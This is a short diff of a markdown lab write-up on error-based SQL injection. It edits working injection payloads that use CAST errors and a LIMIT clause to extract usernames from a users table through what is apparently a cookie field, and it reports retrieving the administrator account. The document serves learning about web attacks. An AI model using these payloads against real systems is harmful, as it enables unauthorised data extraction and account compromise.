SirNothing/sec/VisibleError.md

 We get again 'Underminated string error' because the query is too long.
 Make it shorter by removing some of the cookie hash.
-> f' AND 1=CAST(( SELECT username FROM users) AS int)-- database gives a new error: 'ERROR: more than one row returned by a subquery used as an expression' Database don't know which username to return as there are multiple rows of data.
+> f' AND 1=CAST(( SELECT username FROM users) AS int)--

+database gives a new error: 'ERROR: more than one row returned by a subquery used as an expression'<br />
+Database don't know which username to return as there are multiple rows of data.<br />
 To just query one username from database, we need to add *LIMIT* to the query(Different syntax in other database).

-> f' AND 1=CAST((SELECT username FROM users) AS int)--
+> f' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--

 And we got the first username from the database, which is the administrator.